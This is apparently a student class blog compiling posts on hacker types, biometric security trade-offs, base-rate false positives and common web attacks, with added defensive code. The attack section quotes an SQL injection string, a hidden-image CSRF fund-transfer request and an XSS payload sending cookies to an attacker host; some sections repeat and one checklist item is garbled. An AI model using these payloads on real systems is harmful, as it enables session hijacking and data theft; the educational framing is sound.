Hacker Stats…


In computing, a hacker is any highly skilled computer expert. Depending on the field of computing it has slightly different meanings, and in some contexts has controversial moral and ethical connotations. In its original sense, the term refers to a person in any one of the communities.
Hacker (computer security). People involved with circumvention of computer security. This primarily concerns unauthorized remote computer break-ins via communication networks such as the Internet, but also includes those who debug or fix security problems, and the morally ambiguous


Problem with biometrics for identification:

This shift to biometric-enabled security creates profound threats to commonly accepted notions of privacy and security. It makes possible privacy violations that would make the National Security Agency’s data sweeps seem superficial by comparison.

Biometrics could turn existing surveillance systems into something categorically new—something more powerful and much more invasive. Consider the so-called Domain Awareness System, a network of 3,000 surveillance cameras in New York City. Currently if someone commits a crime, cops can go back and review sections of video. Equip the system with facial-recognition technology, however, and the people behind the controls can actively track you throughout your daily life. “A person who lives and works in lower Manhattan would be under constant surveillance,” says Jennifer Lynch, an attorney at the Electronic Frontier Foundation, a nonprofit group. Face-in-a-crowd detection is a formidable technical problem, but researchers working on projects such as the Department of Homeland Security’s Biometric Optical Surveillance System (BOSS) are making rapid progress.

In addition, once your face, iris or DNA profile becomes a digital file, that file will be difficult to protect. As the recent NSA revelations have made clear, the boundary between commercial and government data is porous at best. Biometric identifiers could also be stolen. It’s easy to replace a swiped credit card, but good luck changing the patterns on your iris.

This could result in a great copy of your identity, not only physically but also biologically, by way of hacking or being hacked.


Posted here by:

Rusel II B. Feliscuzo
BSIT III
IT 314


HACKING

The word “hacker” in the early days was a creative programmer who wrote very clever programs. High school and college students would enjoy the intellectual challenges presented by hacking a system. It would allow them to enhance their abilities about programming. If they bypassed a system it would give them a sense of accomplishment and pride. Compared to hackers now, “hackers” back then did not have ominous reasons to hack a computer; however, because more information is now stored online, hackers want to take a shortcut to economic and personal gains. Additionally, the globalized society has created more opportunities to not just hack from one country but every country. -Cau Thoong

Identification v. authentication

Biometrics can be used in two very distinct ways: as a means of authentication, and as a means of identification. Using a biometric (say, a fingerprint) to authenticate is akin to using a password in combination with a username. The first tells the system who you claim to be, the second attempts to verify that using something you have (like a keycard), something you know (like a password), or something you are (like a fingerprint scan). Using a biometric for identification attempts to determine who you are, within a database of possibilities, using biometric information.

Using a fingerprint scan for identification is much more problematic than using it for authentication. This is a bit like telling people to enter a password and, if it matches any password in the system, allow them into that person’s account. It isn’t quite that bad, because fingerprints are more unique and secure than passwords, but the problem remains that as the size of the database increases, the probability of false matching increases.

For another example, imagine you are trying to identify the victim of a car wreck using dental records. If person X is the registered owner and hasn’t been heard from since the crash, we can use dental records to authenticate that a badly damaged body almost certainly belongs to person X. This is like using biometrics for authentication. Likewise, if we know the driver could be one of three people, we can ascertain with a high degree of certainty which it is, by comparing dental x-rays from the body with records for the three possible matches. The trouble arises when we have no idea who person X is, so we try running the x-rays against the whole collection that we have. Not only is this likely to be resource intensive, it is likely to generate lots of mistakes, for reasons I will detail shortly.

The big database problem in security settings

The problem of a big matching database is especially relevant when you are considering the implementation of wholesale surveillance. Ethical issues aside, imagine a database of the faces of thousands of known terrorists. You could then scan the face of everyone coming into an airport or other public place against that set. Both false positive and false negative matches are potentially problematic. With a false negative, a terrorist in the database could walk through undetected. For any scanning system, some probability (which statisticians call Beta, or the Type II Error Rate) attaches to that outcome. Conversely, there is the possibility of identifying someone not on the list as being one of the listed terrorists: a false positive. The probability of this is Alpha (Type I Error Rate), and it is in setting that threshold that the relative danger of false positives and negatives is established.

A further danger is somewhat akin to ‘mission creep’ – the logic that, since we are already here, we may as well do X in addition to Y, where X is our original purpose. This is a very frequent security issue. For example, think of driver’s licenses. Originally, they were meant to certify to a police officer that someone driving a car is licensed to do so. Some types of people would try to attack that system and make fake credentials. But once having a driver’s license lets you get credit cards, rent expensive equipment, secure other government documents, and the like, a system that existed for one purpose is vulnerable to attacks from people trying to do all sorts of other things. When that broadening of purpose is not anticipated, a serious danger exists that the security applied to the original task will prove inadequate.

A similar problem exists with potential terrorist matching databases. Once we have a system for finding terrorists, why not throw in the faces of teenage runaways, escaped convicts, people with outstanding warrants, etc, etc? Again, putting ethical issues aside, think about the effect of enlarging the match database on the possibility of false positive results. Now, if we can count on security personnel to behave sensibly when such a result occurs, there may not be too much to worry about. Numerous cases of arbitrary detention, and even the use of lethal force, demonstrate that this is a serious issue indeed.

The problem of rare properties

In closing, I want to address a fallacy that relates to this issue. When applying an imperfect test to a rare case, you are almost always more likely to get a false positive than a legitimate result. It seems counterintuitive, but it makes perfect sense. Consider this example:

I have developed a test for a hypothetical rare disease. Let’s call it Panicky Student Syndrome (PSS). In the whole population of students, one in a million is afflicted. My test has an accuracy of 99.99%. More specifically, the probability that a student has PSS is 99.99%, given that they have tested positive. That means that if the test is administered to a random collection of students, there is a one in 10,000 chance that a particular student will test positive, but will not have PSS. Remember that the odds of actually having PSS are only one in a million. There will be 100 false positives for every real one – a situation that will arise in any circumstance where the probability of the person having that trait (whether having a rare disease or being a terrorist) is low.

Given that the reliability of even very expensive biometrics is far below that of my hypothetical PSS test, the ratio of false positives to real ones is likely to be even worse. This is something to consider when governments start coming after fingerprints, iris scans, and the like in the name of increased security.

This entry was originally a post on my blog, at: http://www.sindark.com/2006/10/02/basic-problems-with-biometric-security/

Posted by: Edna Mae Buniel
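The arithmetic behind the "big database" and "rare properties" sections above, as an added example that is not part of the original post. It uses the post's own figures (one in a million prevalence, one in 10,000 chance of a false positive); the zero false-negative default, the independence of comparisons in a 1:N search, and the reuse of the 1-in-10,000 figure as a false-match rate are assumptions made here.

```python
from fractions import Fraction

# Figures taken from the post's Panicky Student Syndrome example.
PREVALENCE = Fraction(1, 1_000_000)       # one student in a million has PSS
FALSE_POSITIVE_RATE = Fraction(1, 10_000)  # healthy student still tests positive


def outcome_rates(prevalence, false_positive_rate, false_negative_rate=0):
    """Probability that one random test is a true positive / a false positive."""
    true_positive = prevalence * (1 - false_negative_rate)
    false_positive = (1 - prevalence) * false_positive_rate
    return true_positive, false_positive


def false_alarms_per_real_hit(prevalence, false_positive_rate, false_negative_rate=0):
    """Expected number of false positives for every genuine positive."""
    true_positive, false_positive = outcome_rates(
        prevalence, false_positive_rate, false_negative_rate)
    return false_positive / true_positive


def chance_positive_is_real(prevalence, false_positive_rate, false_negative_rate=0):
    """Bayes' rule: probability that a positive result is a genuine one."""
    true_positive, false_positive = outcome_rates(
        prevalence, false_positive_rate, false_negative_rate)
    return true_positive / (true_positive + false_positive)


def chance_of_any_false_match(false_match_rate, database_size):
    """1:N identification of someone who is NOT enrolled.

    Assumes each comparison is independent; returns the probability that at
    least one of the N stored templates is wrongly reported as a match.
    """
    return 1 - (1 - false_match_rate) ** database_size


if __name__ == "__main__":
    ratio = false_alarms_per_real_hit(PREVALENCE, FALSE_POSITIVE_RATE)
    ppv = chance_positive_is_real(PREVALENCE, FALSE_POSITIVE_RATE)
    print("false positives per real case: %.4f" % float(ratio))
    print("chance a positive is real:     %.4f%%" % (100 * float(ppv)))

    # Assumed per-comparison false-match rate of 1 in 10,000, swept over
    # watch-list sizes to show how enlarging the database hurts.
    for size in (1, 100, 10_000, 1_000_000):
        p = chance_of_any_false_match(1e-4, size)
        print("database of %9d entries -> %.4f chance of a false match" % (size, p))
```

With these inputs a positive result is genuine about 1% of the time, and a 10,000-entry database already gives an unenrolled person a better-than-even chance of matching somebody.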

“HACKING”

What Is a Hacker, Really?

The basic definition of a hacker is someone who uses a computer system to gain unauthorized access to another system for data or who makes another system unavailable. These hackers will use their skills for a specific goal, such as stealing money, gaining fame by bringing down a computer system, or making a network unavailable — even sometimes destroying them. However, there are three different types of hackers, each with a particular goal, and not all are the bad guys.

Types of Hacking

Ways Hackers Hack Your Site.

1. DDOS ATTACK – DISTRIBUTED DENIAL OF SERVICE ATTACK

DDoS, or Distributed Denial of Service, is where a server or a machine’s services are made unavailable to its users.

And when the system is offline, the hacker proceeds to either compromise the entire website or a specific function of a website to their own advantage.

It’s kind of like having your car stolen when you really need to get somewhere fast.

The usual agenda of a DDoS campaign is to temporarily interrupt or completely take down a successfully running system.

The most common example of a DDoS attack could be sending tons of URL requests to a website or a webpage in a very small amount of time.  This causes bottlenecking at the server side because the CPU just ran out of resources.

Denial-of-service attacks are considered violations of the Internet Architecture Board’s Internet proper use policy, and also violate the acceptable use policies of virtually all Internet service providers.

2. REMOTE CODE EXECUTION ATTACKS

A Remote Code Execution attack is a result of either server side or client side security weaknesses.

Vulnerable components may include libraries, remote directories on a server that haven’t been monitored, frameworks, and other software modules that run on the basis of authenticated user access. Applications that use these components are always under attack through things like scripts, malware, and small command lines that extract information.

The following vulnerable components were downloaded 22 million times in 2011:

Apache CXF Authentication Bypass (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3451)

By failing to provide an identity token, attackers could invoke any web service with full permission.

3. CROSS SITE REQUEST FORGERY ATTACKS

A Cross Site Request Forgery Attack happens when a user is logged into a session (or account) and a hacker uses this opportunity to send them a forged HTTP request to collect their cookie information.

In most cases, the cookie remains valid as long as the user or the attacker stays logged into the account.  This is why websites ask you to log out of your account when you’re finished – it will expire the session immediately.

In other cases, once the user’s browser session is compromised, the hacker can generate requests to the application that will not be able to differentiate between a valid user and a hacker.

A CROSS SITE ATTACK EXAMPLE

Here’s an example:

http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243

<img src="http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

In this case the hacker creates a request that will transfer money from a user’s account, and then embeds this attack in an image request or iframe stored on various sites under the attacker’s control.
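How a server can refuse the forged image request above, as an added example that is not code from the original article. The handler names, the in-memory session store and the HMAC-derived per-session token are assumptions chosen for illustration; the requests are constructed.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # constructed per-process secret
SESSIONS = {"sess-alice": "alice"}      # constructed session store


def csrf_token_for(session_id):
    """Token the server embeds in its own transfer form for this session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_vulnerable(method, cookies, params):
    """Trusts the session cookie alone, which the browser attaches to any request."""
    user = SESSIONS.get(cookies.get("session"))
    if user is None:
        return 401, "not logged in"
    return 200, "%s sent %s to %s" % (
        user, params["amount"], params["destinationAccount"])


def transfer_hardened(method, cookies, params):
    """Requires POST plus a token that a third-party page cannot read or guess."""
    session_id = cookies.get("session")
    user = SESSIONS.get(session_id)
    if user is None:
        return 401, "not logged in"
    if method != "POST":
        return 405, "transfers must use POST"
    supplied = params.get("csrf_token", "")
    expected = csrf_token_for(session_id)
    # Compare as bytes in constant time; non-ASCII input must not raise.
    if not hmac.compare_digest(expected.encode(),
                               supplied.encode("utf-8", "replace")):
        return 403, "missing or invalid CSRF token"
    return 200, "%s sent %s to %s" % (
        user, params["amount"], params["destinationAccount"])


# Constructed requests. The victim's browser sends the cookie in both cases.
BROWSER_COOKIES = {"session": "sess-alice"}

# What the hidden <img> tag produces: a GET carrying the cookie but no token.
FORGED_IMG_REQUEST = (
    "GET", BROWSER_COOKIES,
    {"amount": "1500", "destinationAccount": "attackersAcct"})

# A forged auto-submitting form: POST, but the token can only be guessed.
FORGED_POST_REQUEST = (
    "POST", BROWSER_COOKIES,
    {"amount": "1500", "destinationAccount": "attackersAcct",
     "csrf_token": "0" * 64})


def legitimate_request():
    """The site's own form, which carries the token issued for this session."""
    return ("POST", BROWSER_COOKIES,
            {"amount": "1500", "destinationAccount": "4673243243",
             "csrf_token": csrf_token_for("sess-alice")})


if __name__ == "__main__":
    print("vulnerable, forged img :", transfer_vulnerable(*FORGED_IMG_REQUEST))
    print("hardened,   forged img :", transfer_hardened(*FORGED_IMG_REQUEST))
    print("hardened,   forged POST:", transfer_hardened(*FORGED_POST_REQUEST))
    print("hardened,   legitimate :", transfer_hardened(*legitimate_request()))
```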

4. SYMLINKING – AN INSIDER ATTACK

A symlink is basically a special file that “points to” a hard link on a mounted file system. A symlinking attack occurs when a hacker positions the symlink in such a way that the user or application that accesses the endpoint thinks they’re accessing the right file when they’re really not.

If the endpoint file is an output, the consequence of the symlink attack is that it could be modified instead of the file at the intended location. Modifications to the endpoint file could include appending, overwriting, corrupting, or even changing permissions.

In different variations of a symlinking attack a hacker may be able to control the changes to a file, grant themselves advanced access, insert false information, expose sensitive information or corrupt or destroy vital system or application files.

5. SOCIAL ENGINEERING ATTACKS

A social engineering attack is not technically a “hack”.

It happens when you divulge private information in good faith, such as a credit card number, through common online interactions such as email, chat, social media sites, or virtually any website.

The problem, of course, is that you’re not getting into what you think you’re getting into.

A classic example of a social engineering attack is the “Microsoft tech support” scam.

This is when someone from a call center pretends to be a MS tech support member who says that your computer is slow and/or infected, and can be easily fixed – at a cost, of course.

Here’s an article from Wired.com on how a security expert played along with a so-called Microsoft tech support person.

Biometrics are a security approach that offers great promise, but also presents users and implementers with a number of practical problems. Whilst some of these are technical, and possess technical solutions, however difficult they may be to implement, others are social and cultural. Social and cultural barriers are much more complicated to resolve, and need much more thought by would-be implementers as well as the manufacturers and suppliers before they will succeed. Culturally, one size does not fit all, and that may increase the cost and complexity of solutions.

DISADVANTAGES OF BIOMETRICS

PROCESSES OF BIOMETRICS

COMMON BIOMETRICS

Biometric technologies can either be physiological or behavioral. Physical biometrics includes fingerprint, facial recognition, hand geometry, iris scan, and retina scan. Voice recognition, signature and keystroke are all examples of behavioral biometrics. The commonly used biometrics are briefly described below.

FINGERPRINTING

“Fingerprints are the impressions of the papillary or friction ridges on the surfaces of the hand” (Higgins 2003, p.45). He further stated that fingerprints are the oldest and most widely recognized biometric markers. This statement is backed by Chirillo and Blaul (2003, p. 4) who stated that fingerprint recognition is one of the oldest biometric technologies. Lockie (2002, p. 16) also stated that fingerprints are the most commonly used biometric.

Fingerprints have been used by humans for personal identification and access control for centuries. The matching accuracy using this biometric type has been shown to be very high. Fingerprints of even identical twins are different, and so are the prints on each finger of the same person, which increases the rate of accuracy.

According to postnote (2001), at a national level, automated fingerprinting is the only biometric used generally in the United Kingdom. An investigative project, which was to be completed by April 2002, was looking at the concept of using a single biometric identifier, likely to be fingerprints by default, throughout the Criminal Justice System including police, prisons and courts. Prisons already take ink fingerprints from convicted prisoners. These can be compared against the police database as proof that the right person is being held. An automated system would give rapid confirmation of a person’s identity and allow information about individuals to be shared quickly and easily.

Below are some strengths and weaknesses of fingerprinting according to Nanavati (2002 p. 45).

Strengths of deploying fingerprint technology include:

  • It can be used in a range of environments.
  • It is a mature and proven core technology capable of high level accuracy.
  • It employs ergonomic and easy-to-use devices.
  • The ability to enrol multiple fingers can increase system accuracy and flexibility.

Weaknesses of fingerprint technology include:

  • Most devices are unable to enrol some small percentage of users.
  • Performance can deteriorate over time.
  • It is associated with forensic applications.

FACE RECOGNITION

Facial scan technology employs distinctive features of the human face in order to identify or verify a user. Face appearance is a particularly compelling biometric because of its everyday use by nearly everyone as the primary source of recognizing other humans. It is more acceptable than most biometrics because of its naturalness. Faces have been institutionalized as a guarantor of identity in identity cards and passports since photography became prominent.

However, Chirillo & Blaul (2003 p. 55) stated that most face recognition and identification devices do not in fact perform a scan but instead capture an image of the face in a video or picture format. They further added that the information is converted to a template or a data representation of the captured information, while the initial information is stored. After this process, subsequent scanned faces can then be compared to the original captured faces.

Strengths and weaknesses of face recognition technology are given below according to Nanavati (2002 p. 63).

Strengths of facial recognition include:

  • It is capable of leveraging existing image acquisition equipment.
  • It is capable of searching against static images such as passports and driver’s license photographs.
  • It is the only biometric capable of operating without user cooperation.

Weaknesses of this technology include:

  • Matching accuracy is reduced by change in acquisition environment.
  • Matching accuracy is also reduced by changes in physiological characteristics.
  • Tendency of privacy abuse is high due to non-cooperative enrollment and identification capabilities.

IRIS-SCAN

Bolle et al (2004 p. 43) defined iris as “the colored part of the eye bounded by the pupil and sclera.” They added that the iris has been purported as a universal biometric identifier with very good discriminating characteristics. Iris-scan technology uses the distinctive characteristics of the human iris in order to identify or verify the identity of the users. Nanavati (2002 p. 77) stated that Iris-scan technology has the potential to play a major or large role in the biometric marketplace if real-world systems as well as solutions meet the theoretical promise of this technology. He further added that Iris-scan technology has been successfully deployed in high-security physical access applications, ATMs and also kiosks for banking and travel applications. The technology is also being positioned for desktop usage. Nanavati (2002) stated some strengths and weaknesses of Iris-scan technology.

Strengths of Iris-scan technology:

  • It has the potential for exceptionally high levels of accuracy.
  • It is capable of reliable verification as well as identification.
  • It maintains stability of characteristics over a lifetime frame.

Weaknesses of Iris-scan technology:

  • It has a propensity for false rejection.
  • Acquisition of the images requires moderate attentiveness and training.
  • Some users exhibit a certain degree of discomfort with eye-based technology.
  • A proprietary acquisition device is required for deployment.

VOICE RECOGNITION; VOICE SCAN

According to Chirillo & Blaul (2003, p. 201), voice recognition is actually comprised of two different types of technology, which are voice scan and speech recognition. They explained further that voice-scan is deployed to authenticate a user based on his or her voice characteristics; while on the other hand, speech recognition is used for the “technological comprehension” of spoken words.

Voice-scan technology makes use of the distinctive aspects of the voice to identify or verify the identity of users. Voice-scan is sometimes taken as speech recognition, a technology that works by translating what a user is saying (the process in speech recognition is unrelated to authentication). Nanavati (2002, p. 87) described voice-scan technology as one that verifies the identity of the user who is speaking. Bolle et al (2003, p. 40) stated that similar to face appearance, voice-scan (also known as voice recognition) is often used due to its prevalence in human communication and its day to day use. They further added that voice is a behavioral biometric but it depends on some underlying physical traits, which “govern the type of speech signals we are able and likely to utter.” Examples of these physical traits are the fundamental frequency (which is a function of the vocal tract length), cadence, nasal tone. Nanavati (2002, p. 87) stated the strengths and weaknesses of voice-scan.

Strengths of voice-scan technology:

  • It is capable of leveraging telephony infrastructure.
  • It effectively layers with other processes such as speech recognition and verbal passwords.
  • It generally lacks the negative perceptions associated with other biometrics.

Weaknesses of voice-scan technology:

  • It is potentially more susceptible to replay attacks than other biometrics.
  • Its accuracy is challenged by low-quality capture devices, ambient noise, etc.
  • The success of voice-scan as a PC solution requires users to develop new habits.
  • The large size of the template limits the number of potential applications.

HAND-SCAN

Hand-scan is one of the most established biometric technologies. It has been in use for years in several applications, especially for verification of individuals. According to Nanavati (2002, p. 99), hand-scan technology makes use of the distinctive parts of the hand, particularly the height and the width of the back of the hand as well as the finger. Hand-scan is more of an application-specific solution than the majority of biometric technologies and is used exclusively for physical access and also time and attendance applications.

Although hand-scan geometry biometrics is still a technology that is growing slowly, Chirillo & Blaul (2003, p. 145) stated that estimates forecast revenues to increase to approximately $50 million in 2005, which is approximately 2 to 5 percent of the whole biometric market. They gave the primary reason for the minimal forecast as limited usage and aptness mainly for access control and time and attendance applications.

Nanavati (2002, p. 99) stated the strengths and weaknesses of hand-scan technology.

Strengths of hand-scan technology:

  • It is able to operate in challenging environments.
  • It is an established, reliable core technology.
  • It is generally perceived as non intrusive.
  • It is based on relatively stable physiological characteristics.

Weaknesses of hand-scan technology:

  • It has limited accuracy.
  • The form factor limits the scope of potential applications.
  • The ergonomic design limits usage by certain populations.

Chirillo & Blaul (2003, p. 146) cited cost as a weakness, stating that a hand-scan reader costs approximately $1,400 to $2000, placing the devices towards the high end of the physical security spectrum.

WHERE NOT TO USE BIOMETRICS

Biometrics offer a great amount of benefits in safeguarding systems and are perceived as more reliable than other security techniques (traditional security methods). However, biometric technologies are not the perfect security to be deployed for every application, and in some cases biometric authentication is just not the right solution.

One of the major challenges facing the biometric industry is defining those environments in which biometrics offer the strongest benefits to both individuals and institutions, and then showing that the benefits of deployment outweigh the risk as well as the costs (Nanavati 2002, p. 7).

Posted by:

Delicana, Flora Mae

Hacking

A. What did the word “hacker” mean in the early days of computing?

-The word hacker originally was used to describe someone who was proficient in using a computer. The word did not receive its bad connotation until the 1980’s. Early “hackers” were people who enjoyed exploring computers and making them do things that were unheard of at the time. A “good hack” was used to describe a well coded program, but in today’s world, when people hear the word hack they usually begin to think of someone who manipulates or steals information and uses it for their own personal gain.
– Joshua Dixon

Types of Hacker 

  1. Script Kiddie – Script Kiddies normally don’t care about hacking (if they did, they’d be Green Hats. See below.). They copy code and use it for a virus or an SQLi or something else. Script Kiddies will never hack for themselves; they’ll just download overused software (LOIC or Metasploit, for example) and watch a YouTube video on how to use it. A common Script Kiddie attack is DoSing or DDoSing (Denial of Service and Distributed Denial of Service), in which they flood an IP with so much information it collapses under the strain. This attack is frequently used by the “hacker” group Anonymous, which doesn’t help anyone’s reputation.
  2. White Hat – Also known as ethical hackers, White Hat hackers are the good guys of the hacker world. They’ll help you remove a virus or PenTest a company. Most White Hat hackers hold a college degree in IT security or computer science and must be certified to pursue a career in hacking. The most popular certification is the CEH (Certified Ethical Hacker) from the EC-Council.
  3. Black Hat – Also known as crackers, these are the men and women you hear about in the news. They find banks or other companies with weak security and steal money or credit card information. The surprising truth about their methods of attack is that they often use common hacking practices they learned early on.
  4. Gray Hat – Nothing is ever just black or white; the same is true in the world of hacking. Gray Hat hackers don’t steal money or information (although, sometimes they deface a website or two), yet they don’t help people for good (but, they could if they wanted to). These hackers comprise most of the hacking world, even though Black Hat hackers garner most (if not all) of the media’s attention.
  5. Green Hat – These are the hacker “n00bz,” but unlike Script Kiddies, they care about hacking and strive to become full-blown hackers. They’re often flamed by the hacker community for asking many basic questions. When their questions are answered, they’ll listen with the intent and curiosity of a child listening to family stories.
  6. Red Hat – These are the vigilantes of the hacker world. They’re like White Hats in that they halt Black Hats, but these folks are downright SCARY to those who have ever tried so much as a PenTest. Instead of reporting the malicious hacker, they shut him/her down by uploading viruses, DoSing and accessing his/her computer to destroy it from the inside out. They leverage multiple aggressive methods that might force a cracker to need a new computer.
  7. Blue Hat – If a Script Kiddie took revenge, he/she might become a Blue Hat. Blue Hat hackers will seek vengeance on those who’ve made them angry. Most Blue Hats are n00bz, but like the Script Kiddies, they have no desire to learn.

————————————————

B. Examples of Hacking

 

1.  INJECTION ATTACKS

Injection Attacking occurs when there are flaws in your SQL Database, SQL libraries, or even the operating system itself. Employees open seemingly credible files with hidden commands, or “injections”, unknowingly.

In doing so, they’ve allowed hackers to gain unauthorized access to private data such as social security numbers, credit card numbers or other financial data.

TECHNICAL INJECTION ATTACK EXAMPLE:

An Injection Attack could have this command line:

String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";

The hacker modifies the ‘id’ parameter in their browser to send: ' or '1'='1. This changes the meaning of the query to return all the records from the accounts database to the hacker, instead of only the intended customers.
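The same query run against a small database, next to its parameterized form, as an added example that is not from the original article. The table layout, the three rows and the function names are constructed for illustration; SQLite stands in for whatever database the application uses.

```python
import sqlite3

# The value the text above describes being sent as the 'id' parameter.
PAYLOAD = "' or '1'='1"


def make_db():
    """In-memory accounts table with three constructed customers."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE accounts (custID TEXT PRIMARY KEY, owner TEXT, balance INTEGER)")
    db.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("1001", "alice", 2500), ("1002", "bob", 90), ("1003", "carol", 14000)])
    return db


def lookup_vulnerable(db, cust_id):
    """Mirrors the article's query: the parameter is pasted into the SQL text,
    so quote characters in it become part of the statement."""
    query = "SELECT * FROM accounts WHERE custID='" + cust_id + "'"
    return db.execute(query).fetchall()


def lookup_parameterized(db, cust_id):
    """The SQL text is fixed; the driver passes cust_id purely as a value."""
    return db.execute(
        "SELECT * FROM accounts WHERE custID=?", (cust_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal id :", lookup_vulnerable(db, "1002"))
    print("vulnerable, payload   :", lookup_vulnerable(db, PAYLOAD))
    print("parameterized, normal :", lookup_parameterized(db, "1002"))
    print("parameterized, payload:", lookup_parameterized(db, PAYLOAD))
```

The parameterized lookup treats the payload as a customer ID that simply does not exist, so it returns no rows.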

2. CROSS SITE SCRIPTING ATTACKS

Cross Site Scripting, also known as an XSS attack, occurs when an application, URL “get request”, or file packet is sent to the web browser window, bypassing the validation process. Once an XSS script is triggered, its deceptive property makes users believe that the compromised page of a specific website is legitimate.

For example, if http://www.example.com/abcd.html has XSS script in it, the user might see a popup window asking for their credit card info and other sensitive info.

TECHNICAL CROSS SITE SCRIPTING EXAMPLE:

A more technical example:

(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

The attacker modifies the ‘CC’ parameter in their browser to:

'>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie'

This causes the user’s session ID to be sent to the attacker’s website, allowing the hacker to hijack the user’s current session.  That means the hacker has access to the website admin credentials and can take complete control over it.  In other words, hack it.
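Why the concatenated input field is injectable and what output encoding changes, as an added example that is not from the original article. The render functions reproduce the article's markup in Python; the probe value is a constructed, inert string that only uses the same quote-and-bracket breakout, and the parser is there to show what a browser would see.

```python
import html
from html.parser import HTMLParser

# Constructed probe: closes the value attribute and the tag, then adds markup.
PROBE = "'><b>injected</b>"


def render_vulnerable(cc):
    """Same construction as the article's line: the parameter is pasted in raw."""
    return "<input name='creditcard' type='TEXT' value='" + cc + "'>"


def render_escaped(cc):
    """Encode &, <, > and both quote characters before placing the value
    inside a quoted attribute."""
    return ("<input name='creditcard' type='TEXT' value='"
            + html.escape(cc, quote=True) + "'>")


class _TagCollector(HTMLParser):
    """Records every start tag and the value attribute of the input field."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.value = dict(attrs).get("value")


def inspect(markup):
    """Return (list of elements found, decoded value attribute of <input>)."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.value


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable),
                         ("escaped", render_escaped)):
        markup = render(PROBE)
        tags, value = inspect(markup)
        print(name)
        print("  markup  :", markup)
        print("  elements:", tags)
        print("  value   :", repr(value))
```

In the vulnerable output the parser finds a second element that the application never wrote; in the escaped output the whole probe stays inside the `value` attribute as text.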

3. BROKEN AUTHENTICATION AND SESSION MANAGEMENT ATTACKS

If the user authentication system of your website is weak, hackers can take full advantage.

Authentication systems involve passwords, key management, session IDs, and cookies that can allow a hacker to access your account from any computer (as long as they are valid).

If a hacker exploits the authentication and session management system, they can assume the user’s identity.

Scary indeed.

Ask yourself these questions to find out if your website is vulnerable to a broken authentication and session management attack:

  • Are user credentials weak (e.g. stored using hashing or encryption)?
  • Can credentials be guessed or overwritten through weak account management functions (e.g. account creation, change password, recover password, weak session IDs)?
  • Are session IDs exposed in the URL (e.g. URL rewriting)?
  • Are session IDs vulnerable to session fixation attacks?
  • Do session IDs timeout and can users log out?

If you answered “yes” to any of these questions, your site could be vulnerable to a hacker.

4. CLICKJACKING ATTACKS

Clickjacking, also called a UI Redress Attack, is when a hacker uses multiple opaque layers to trick a user into clicking the top layer without them knowing.

Thus the attacker is “hijacking” clicks that are not meant for the actual page, but for a page where the attacker wants you to be.

For example, using a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password for their bank account, but are actually typing into an invisible frame controlled by the attacker.

CLICKJACKING EXAMPLE:

Here’s a live, but safe example of how clickjacking works:

http://attacker.kotowicz.net/alphabet-hero/game.html

And here’s a video that shows how we helped Twitter defend against a Clickjacking attack:
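A site defends against this by telling browsers who may put its pages in a frame. The checker below is an added example, not part of the original article: it classifies a response's framing policy from its headers, and the sample responses and paths are constructed for illustration.

```python
def framing_policy(headers):
    """Classify who may frame a response: "none", "self", "allowlist" or "anyone"."""
    h = {k.lower(): v for k, v in headers.items()}

    # CSP frame-ancestors takes precedence over X-Frame-Options where supported.
    for directive in h.get("content-security-policy", "").split(";"):
        parts = directive.split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [p.lower() for p in parts[1:]]
            # An empty source list matches no origin, same as 'none'.
            if not sources or sources == ["'none'"]:
                return "none"
            # A bare wildcard or bare scheme lets any site frame the page.
            if any(s in ("*", "http:", "https:") for s in sources):
                return "anyone"
            if sources == ["'self'"]:
                return "self"
            return "allowlist"

    xfo = h.get("x-frame-options", "").strip().lower()
    if xfo == "deny":
        return "none"
    if xfo == "sameorigin":
        return "self"
    # ALLOW-FROM is obsolete and ignored by current browsers, so it is
    # treated, like a missing or unrecognised value, as no protection.
    return "anyone"


def frameable_by_anyone(responses):
    """Return the paths whose responses any third-party site could frame."""
    return [path for path, headers in responses.items()
            if framing_policy(headers) == "anyone"]


# Constructed sample: response headers for five pages of one site.
SAMPLE_RESPONSES = {
    "/account": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
    "/login": {"Content-Type": "text/html"},
    "/widget": {"Content-Security-Policy": "frame-ancestors 'self' https://partner.example"},
    "/legacy": {"X-Frame-Options": "ALLOW-FROM https://partner.example"},
    "/help": {"x-frame-options": "sameorigin"},
}

if __name__ == "__main__":
    for path, headers in SAMPLE_RESPONSES.items():
        print(f"{path:10s} {framing_policy(headers)}")
```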

5. DNS CACHE POISONING

DNS Cache Poisoning involves old cache data that you might think you no longer have on your computer, but is actually “toxic”.

Also known as DNS Spoofing, hackers can identify vulnerabilities in a domain name system, which allows them to divert traffic from legit servers to a fake website and/or server.

This form of attack can spread and replicate itself from one DNS server to another DNS, “poisoning” everything in its path.

In fact, in 2010, a DNS poisoning attack completely compromised the Great Firewall of China (GFC) temporarily and censored certain content in the United States until the problem was fixed.

6. SOCIAL ENGINEERING ATTACKS

A social engineering attack is not technically a “hack”.

It happens when you divulge private information in good faith, such as a credit card number, through common online interactions such as email, chat, social media sites, or virtually any website.

The problem, of course, is that you’re not getting into what you think you’re getting into.

A classic example of a social engineering attack is the “Microsoft tech support” scam.

This is when someone from a call center pretends to be a MS tech support member who says that your computer is slow and/or infected, and can be easily fixed – at a cost, of course.

Here’s an article from Wired.com on how a security expert played along with a so-called Microsoft tech support person.

7. SYMLINKING – AN INSIDER ATTACK

